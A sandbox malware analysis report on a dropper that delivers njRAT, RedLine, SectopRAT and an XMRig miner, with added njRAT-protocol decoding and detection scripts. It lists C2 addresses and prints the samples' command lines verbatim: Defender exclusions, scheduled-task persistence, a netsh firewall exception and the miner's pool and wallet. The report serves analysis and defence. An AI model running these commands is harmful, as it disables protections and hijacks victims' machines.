Analysis

  • max time kernel
    149s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    08-11-2024 13:38

General

  • Target

    ff8addf2b89de210fa350138a30eaa67a5772f59dcd0480ffc9d339e7cdd266f.exe

  • Size

    2.9MB

  • MD5

    01fc40917e3e56267e23bbcc3225d6d0

  • SHA1

    68a8782da431eddcf7ad88699580a7f034fffbe7

  • SHA256

    ff8addf2b89de210fa350138a30eaa67a5772f59dcd0480ffc9d339e7cdd266f

  • SHA512

    33d394bc795b96f815d47df8a382d720bfbb8b2d5e9288c868d83ff25712cd32737f1bf868f9ba238e72112b0cc425af538d3bc226267b38213fb364998b344c

  • SSDEEP

    49152:cu3XPRmBGiOoYcCeQE7Wq58ctIgktXub5PnyzMezAvKjGM76bfvgAz3:NXPR5JCyq5ptktgdn2RAvKjV767vgAz

Malware Config

Extracted

Family

njrat

Version

im523

Botnet

HacKed

C2

91.193.4.201:58287

Mutex

344a7b760874a7de0ff245bf58f8fa0d

Attributes
  • reg_key

    344a7b760874a7de0ff245bf58f8fa0d

  • splitter

    |'|'|

Extracted

Family

redline

Botnet

544363603

C2

91.142.79.35:13400
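
A frame decoder for the njRAT C2 configuration extracted above, added here as a worked example (it is not part of the sandbox output). SPLITTER and C2 are the values from the config. The framing (ASCII decimal payload length, one NUL byte, then the payload) and the `ll` registration command come from public njRAT analyses rather than from this report, and the sample stream is constructed, so the field contents are illustrative assumptions, not values observed in this run.

```python
"""Decode njRAT C2 frames with the splitter extracted from this sample.

Added example, not part of the sandbox report. SPLITTER and C2 come from the
Malware Config above. The framing (ASCII decimal payload length, one NUL
byte, then the payload) and the "ll" registration command are taken from
public njRAT analyses; STREAM below is constructed for the example and its
field contents are illustrative, not values observed in this run.
"""
from dataclasses import dataclass
from typing import List, Tuple

SPLITTER = "|'|'|"             # extracted: fields inside a frame are joined with this
C2 = ("91.193.4.201", 58287)   # extracted: client->server flows to this endpoint are the input
MAX_LEN_DIGITS = 10            # sanity cap: a longer run with no NUL is not an njRAT frame


@dataclass
class Frame:
    command: str        # first field, e.g. "ll" (registration), "inf", "proc"
    fields: List[str]   # remaining fields, in wire order
    raw: bytes          # payload bytes without the length prefix


def build_frame(*fields: str) -> bytes:
    """Encode one frame the way the client does: "<len>\\0<payload>"."""
    payload = SPLITTER.join(fields).encode("utf-8")
    return str(len(payload)).encode("ascii") + b"\x00" + payload


def parse_frames(buf: bytes) -> Tuple[List[Frame], bytes]:
    """Return all complete frames in buf plus the unconsumed tail.

    The tail is a partial frame (or empty); the caller prepends it to the next
    TCP segment, because frames do not align to segment boundaries.
    """
    frames: List[Frame] = []
    while True:
        sep = buf.find(b"\x00")
        if sep == -1:
            if len(buf) > MAX_LEN_DIGITS:
                raise ValueError("no length prefix: not an njRAT stream")
            return frames, buf
        length_txt = buf[:sep]
        if not length_txt.isdigit():
            raise ValueError(f"bad length prefix {length_txt!r}")
        end = sep + 1 + int(length_txt)
        if len(buf) < end:
            return frames, buf             # payload not fully received yet
        payload = buf[sep + 1:end]
        parts = payload.decode("utf-8", errors="replace").split(SPLITTER)
        frames.append(Frame(command=parts[0], fields=parts[1:], raw=payload))
        buf = buf[end:]


def decode_stream(segments: List[bytes]) -> List[Frame]:
    """Feed client->server segments in order, carrying partials across them."""
    pending = b""
    out: List[Frame] = []
    for seg in segments:
        frames, pending = parse_frames(pending + seg)
        out.extend(frames)
    return out


def looks_like_njrat(buf: bytes) -> bool:
    """Cheap flow triage: does the first chunk parse as njRAT framing?"""
    try:
        frames, _ = parse_frames(buf)
    except ValueError:
        return False
    return bool(frames)


# Constructed sample: a registration frame split across two segments, then a
# short "inf" frame whose payload only arrives in a later segment. The victim
# id prefix reuses the extracted botnet name "HacKed"; the rest is made up.
REGISTRATION = build_frame(
    "ll", "HacKed_1A2B3C4D", "DESKTOP-TEST", "Admin", "24-11-08", "",
    "Win 10 Pro SP0 x64", "No", "im523", "..", "",
)
STREAM = REGISTRATION + build_frame("inf")[:3]
SEGMENTS = [STREAM[:20], STREAM[20:], b"nf"]

if __name__ == "__main__":
    for f in decode_stream(SEGMENTS):
        print(f.command, len(f.fields), f.fields[:3])
```

Run it over the client-to-server bytes of a flow to 91.193.4.201:58287 in segment order; the partial-frame carry-over is what makes it usable on a pcap, where the length prefix and the payload rarely land in the same segment.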

Signatures

  • Njrat family
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 2 IoCs
  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 2 IoCs
  • Sectoprat family
  • Xmrig family
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • XMRig Miner payload 11 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, or processes (Add-MpPreference). In this run only path exclusions are added: the user profile, Roaming AppData, Temp and the Windows directory.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 10 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 13 IoCs
  • Themida packer 8 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Drops autorun.inf file 1 TTPs 5 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Drops file in System32 directory 9 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. In this run netsh is invoked by sys32.exe to add a firewall exception for itself (netsh firewall add allowedprogram), not to register a helper DLL, so treat the Netsh Helper DLL tag as a netsh-execution heuristic and verify the firewall rule set directly.

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempts to gather information about the victim's system language in order to infer the geographical location of the host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\ff8addf2b89de210fa350138a30eaa67a5772f59dcd0480ffc9d339e7cdd266f.exe
    "C:\Users\Admin\AppData\Local\Temp\ff8addf2b89de210fa350138a30eaa67a5772f59dcd0480ffc9d339e7cdd266f.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2028
    • C:\Users\Admin\AppData\Roaming\BittyHack.exe
      "C:\Users\Admin\AppData\Roaming\BittyHack.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:2772
    • C:\Users\Admin\AppData\Roaming\WindowsHost.exe
      "C:\Users\Admin\AppData\Roaming\WindowsHost.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2544
      • C:\Users\Admin\AppData\Roaming\WinUpdates.exe
        "C:\Users\Admin\AppData\Roaming\WinUpdates.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4140
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1440
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:4812
        • C:\Windows\system32\services64.exe
          "C:\Windows\system32\services64.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4280
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
            5⤵
              PID:2964
              • C:\Windows\system32\schtasks.exe
                schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
                6⤵
                • Scheduled Task/Job: Scheduled Task
                PID:708
            • C:\Windows\system32\Microsoft\Libs\sihost64.exe
              "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
              5⤵
              • Executes dropped EXE
              PID:1308
            • C:\Windows\System32\svchost.exe
              C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=467cijEdKaagF8BDuU34TjMYk82LvhFozMctKetFMtaU8TYBejNKLbbMb3PbANBpZ97XjkJjzQJbyX9BdU5CmPRX3CUC8dU --pass=123 --cpu-max-threads-hint=60 --cinit-remote-config="tHg/Fec4JaWoq3ZRb8ABB9AEzMGpzWZtTQtnnclZnhc=" --cinit-stealth-targets="…" --cinit-idle-wait=1 --cinit-idle-cpu=80 --tls --cinit-stealth
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1816
        • C:\Users\Admin\AppData\Roaming\Explorer.exe
          "C:\Users\Admin\AppData\Roaming\Explorer.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4408
          • C:\Users\Admin\AppData\Roaming\WindowsCrashHandler.exe
            "C:\Users\Admin\AppData\Roaming\WindowsCrashHandler.exe"
            4⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:4416
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2928
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1512
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3672
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4144
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2684
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Roaming\WindowsCrashHandler.exe"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4628
              • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Roaming\WindowsCrashHandler.exe"
                6⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4296
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3000
                  • C:\Windows\system32\schtasks.exe
                    schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                    8⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:704
                • C:\Windows\system32\services32.exe
                  "C:\Windows\system32\services32.exe"
                  7⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:3768
                  • C:\Windows\system32\cmd.exe
                    "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2640
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2736
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4320
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious use of AdjustPrivilegeToken
                      PID:432
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1920
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
                    8⤵
                      PID:2632
                      • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                        C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
                        9⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1116
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                          10⤵
                            PID:4336
                            • C:\Windows\system32\schtasks.exe
                              schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                              11⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:4960
                          • C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
                            "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
                            10⤵
                            • Executes dropped EXE
                            PID:2348
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
                            10⤵
                              PID:1664
                              • C:\Windows\system32\choice.exe
                                choice /C Y /N /D Y /T 3
                                11⤵
                                  PID:2852
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4008
                  • C:\Windows\system32\choice.exe
                    choice /C Y /N /D Y /T 3
                    8⤵
                    PID:3964
          • C:\Users\Admin\AppData\Roaming\Win10.exe
            "C:\Users\Admin\AppData\Roaming\Win10.exe"
            4⤵
            • Checks computer location settings
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4960
            • C:\Users\Admin\AppData\Local\Temp\sys32.exe
              "C:\Users\Admin\AppData\Local\Temp\sys32.exe"
              5⤵
              • Drops startup file
              • Executes dropped EXE
              • Adds Run key to start application
              • Drops autorun.inf file
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: GetForegroundWindowSpam
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2332
              • C:\Windows\SysWOW64\netsh.exe
                netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\sys32.exe" "sys32.exe" ENABLE
                6⤵
                • Modifies Windows Firewall
                • Event Triggered Execution: Netsh Helper DLL
                • System Location Discovery: System Language Discovery
                PID:4052
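
The process tree above is a chain of living-off-the-land commands: Add-MpPreference path exclusions from cmd.exe, an on-logon scheduled task at the highest run level pointing at a non-stock services64.exe/services32.exe dropped into System32, a netsh firewall exception for a Temp binary, and an XMRig launch under a copied svchost.exe name. The script below is an added example, not part of the sandbox report: it runs simple detection rules over those command lines and pulls out the indicators a responder would pivot on. EVENTS is constructed from the command lines on this page (the XMRig line is abridged to its network and stealth flags); the rule names and output fields are this example's own, not a vendor schema.

```python
"""Triage the process-creation command lines recorded in the tree above.

Added example, not part of the sandbox report. EVENTS is constructed from the
command lines on this page (the XMRig line is abridged to its network and
stealth flags); the rule names and output fields are this example's own, not a
vendor schema. Sysmon Event ID 1 or Security 4688 CommandLine values can be
fed in the same shape.
"""
import re
from typing import Any, Dict, List

EVENTS: List[Dict[str, Any]] = [
    {"pid": 1512, "image": "powershell.exe",
     "cmd": "powershell -Command Add-MpPreference -ExclusionPath 'C:\\Users\\Admin'"},
    {"pid": 4812, "image": "schtasks.exe",
     "cmd": 'schtasks /create /f /sc onlogon /rl highest /tn "services64" '
            '/tr \'"C:\\Windows\\system32\\services64.exe"\''},
    {"pid": 4052, "image": "netsh.exe",
     "cmd": 'netsh firewall add allowedprogram '
            '"C:\\Users\\Admin\\AppData\\Local\\Temp\\sys32.exe" "sys32.exe" ENABLE'},
    {"pid": 1816, "image": "svchost.exe",   # note the mixed separators in the recorded path
     "cmd": 'C:\\Windows/System32\\svchost.exe --cinit-find-x -B --algo="rx/0" '
            '--randomx-mode=auto --url=xmr-eu2.nanopool.org:14433 '
            '--user=467cijEdKaagF8BDuU34TjMYk82LvhFozMctKetFMtaU8TYBejNKLbbMb3PbANBpZ97XjkJjzQJbyX9BdU5CmPRX3CUC8dU '
            '--pass=123 --tls --cinit-stealth'},
    {"pid": 2852, "image": "choice.exe", "cmd": "choice /C Y /N /D Y /T 3"},  # self-delete timer, benign alone
]

# Rule name -> pattern evaluated against the full command line.
RULES = [
    ("defender_exclusion_added",
     re.compile(r"Add-MpPreference\s+-Exclusion(?:Path|Extension|Process)\b", re.I)),
    ("schtasks_onlogon_highest",
     re.compile(r"\bschtasks\b.*/create\b.*/sc\s+onlogon\b.*/rl\s+highest\b", re.I)),
    ("netsh_firewall_allow_user_path",
     re.compile(r'\bnetsh\b.*\bfirewall\s+add\s+allowedprogram\s+"?[^"]*\\(?:AppData|Temp)\\', re.I)),
    ("xmrig_miner_flags",
     re.compile(r"--(?:algo|randomx-mode|cinit-\w+)\b|--url=\S+:\d+", re.I)),
]

# Standard Monero address: 95 Base58 characters starting with 4.
MONERO_ADDR = re.compile(r"4[1-9A-HJ-NP-Za-km-z]{94}")


def extract_iocs(rule: str, cmd: str) -> Dict[str, Any]:
    """Pull the indicator a responder would pivot on for each rule hit."""
    iocs: Dict[str, Any] = {}
    if rule == "defender_exclusion_added":
        m = re.search(r"-Exclusion\w+\s+'([^']+)'", cmd)
        if m:
            iocs["exclusion"] = m.group(1)
    elif rule == "schtasks_onlogon_highest":
        tn = re.search(r'/tn\s+"?([^"\s]+)', cmd)
        tr = re.search(r"""/tr\s+'?"?([^'"]+)""", cmd)
        if tn:
            iocs["task"] = tn.group(1)
        if tr:
            iocs["task_target"] = tr.group(1)
            # services64.exe / services32.exe mimic services.exe but are not stock Windows binaries.
            iocs["target_in_system32"] = "\\system32\\" in tr.group(1).lower()
    elif rule == "netsh_firewall_allow_user_path":
        m = re.search(r'allowedprogram\s+"([^"]+)"', cmd)
        if m:
            iocs["allowed_program"] = m.group(1)
    elif rule == "xmrig_miner_flags":
        url = re.search(r'--url="?([^\s"]+)', cmd)
        user = re.search(r'--user="?([^\s"]+)', cmd)
        if url:
            iocs["pool"] = url.group(1)
        if user:
            iocs["wallet"] = user.group(1)
            iocs["wallet_is_monero_format"] = MONERO_ADDR.fullmatch(user.group(1)) is not None
    return iocs


def triage(event: Dict[str, Any]) -> Dict[str, Any]:
    """Evaluate every rule against one event and collect the IOCs of the hits."""
    hits = [name for name, rx in RULES if rx.search(event["cmd"])]
    iocs: Dict[str, Any] = {}
    for name in hits:
        iocs.update(extract_iocs(name, event["cmd"]))
    return {"pid": event["pid"], "image": event["image"], "rules": hits, "iocs": iocs}


def triage_all(events: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
    """Keep only events that tripped at least one rule, in input order."""
    return [r for r in map(triage, events) if r["rules"]]


if __name__ == "__main__":
    for r in triage_all(EVENTS):
        print(r["pid"], r["image"], r["rules"], r["iocs"])
```

The choice.exe self-delete timer is deliberately left unflagged: on its own it is benign, and it only becomes interesting through its parent (cmd.exe spawned by svchost32.exe), which is a parent-child correlation rather than a command-line rule. The mixed path separators in the recorded miner command line and the non-stock names under System32 (services64.exe, sihost64.exe, sihost32.exe) are cheap additional pivots when hunting across a fleet.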

              Network

              MITRE ATT&CK Enterprise v15

              Downloads

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                Filesize

                2KB

                MD5

                440cb38dbee06645cc8b74d51f6e5f71

                SHA1

                d7e61da91dc4502e9ae83281b88c1e48584edb7c

                SHA256

                8ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe

                SHA512

                3aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost32.exe.log

                Filesize

                539B

                MD5

                b245679121623b152bea5562c173ba11

                SHA1

                47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d

                SHA256

                73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f

                SHA512

                75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                944B

                MD5

                566e5ddd60b501af160cb218243fcc89

                SHA1

                d99743fe6c8af4c61b2da839d6d0f0a17c097a34

                SHA256

                fcd8f03f9461154414f8e82888e0fbba60229d5a659557aee20cf56cc59894e3

                SHA512

                3aaddd0c8259b793b0cdfa643fd4344892078d027ae9c38cc6c2ff0d7c5476afc3bfc4e6a03922a49eea2e5661a3f4759eb4d566cb89a72c33f9f584e30ba10a

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                944B

                MD5

                eb033be02578f9635ec47bdc1de5c3fb

                SHA1

                ec356bc87381354a06baa9c30e8c3ac3d30e0f6f

                SHA256

                bd827af3192bf83c75a32e51ed2de83bd3b90d6b99350721a189a57cec15d063

                SHA512

                4d8778503646f7016df73ff9d204760f4fe4d2b24157920ac3e5651653373975b2f2d229530143059f11b16c42822ad7963e628ad6066022ee712c17d90595ed

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                944B

                MD5

                98baf5117c4fcec1692067d200c58ab3

                SHA1

                5b33a57b72141e7508b615e17fb621612cb8e390

                SHA256

                30bf8496e9a08f4fdfe4767abcd565f92b6da06ca1c7823a70cb7cab16262e51

                SHA512

                344a70bfc037d54176f12db91f05bf4295bb587a5062fd1febe6f52853571170bd8ef6042cb87b893185bbae1937cf77b679d7970f8cc1c2666b0b7c1b32987d

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                944B

                MD5

                4ff4fd481c9b346992fcbb86e534c039

                SHA1

                784344362009eb6029a7e58792e757f82e6e1564

                SHA256

                b9102c8b1e1b4ef3e0b2c7d81fdc330476d5805dd6fdc00924ef0ceebaa7d0de

                SHA512

                708e2f7a3b505269f4da6e45b7704779439f4a7b21abfce374c41b513907566940c9ca174b175465e678b841509ae00dedc6e8ce8dc7c9613becc6f214bec668

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                944B

                MD5

                15dde0683cd1ca19785d7262f554ba93

                SHA1

                d039c577e438546d10ac64837b05da480d06bf69

                SHA256

                d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

                SHA512

                57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                944B

                MD5

                da5c82b0e070047f7377042d08093ff4

                SHA1

                89d05987cd60828cca516c5c40c18935c35e8bd3

                SHA256

                77a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5

                SHA512

                7360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                944B

                MD5

                8ac417cf4c6b9975e75ecb3830a8a682

                SHA1

                40478daa97501ce3bccc287a74aa249ec082e252

                SHA256

                cf31af106ed5a03da23c5d25f97c99526d07d1053e14d25967c6ad3eb32b32b9

                SHA512

                8db7d3885c4c9bdbbfcca97d2ca651de4a0286bc14023582c6deca6f6c509882c25619b67bd9e6993b3b9090a54fd0b2a7d542edd976c0582a3785bfeffb577f

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lcud2ghg.zlf.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Users\Admin\AppData\Local\Temp\svchost32.exe

                Filesize

                25KB

                MD5

                0c0a17b9ae220d337693c257a74031d4

                SHA1

                970f54dd9c02a3fd5e242f62d98a00779ebc1aee

                SHA256

                50acbb9a157e979f08fe1bfd920a2c6d0385bd3f0aee4c4865ecad555c06defa

                SHA512

                ac0076f94bffd774a9c8d30e5e1ee74b0b46cec12ee3fd4b5e1a0fc8e638eb3cb1349ac30e4a0fce2281bba7421fc50ff2bc5d6987a50116716e96e0c19f9c49

              • C:\Users\Admin\AppData\Roaming\BittyHack.exe

                Filesize

                2.7MB

                MD5

                b11d0aa406489018391c281d5bc7f64d

                SHA1

                1959bb5279bdf14998d40e69e370d3dc4bd10fcc

                SHA256

                9789f312707fa3ab30aea641abbca424b27abb8043221c335247c958c52fc449

                SHA512

                d9787391662b5643382a9d10ffe01d74a28f49580586bedec4f67dd7eb1fd8a2d74e1e1735bcb0e91c2bfc9babd6de968d07c9a203746d5d5e51db7547f95f68

              • C:\Users\Admin\AppData\Roaming\Explorer.exe

                Filesize

                66KB

                MD5

                52404bfacf116c18911d577b06b4caae

                SHA1

                baa105e8d868d345a10d8824c2ce0b74c0dd6547

                SHA256

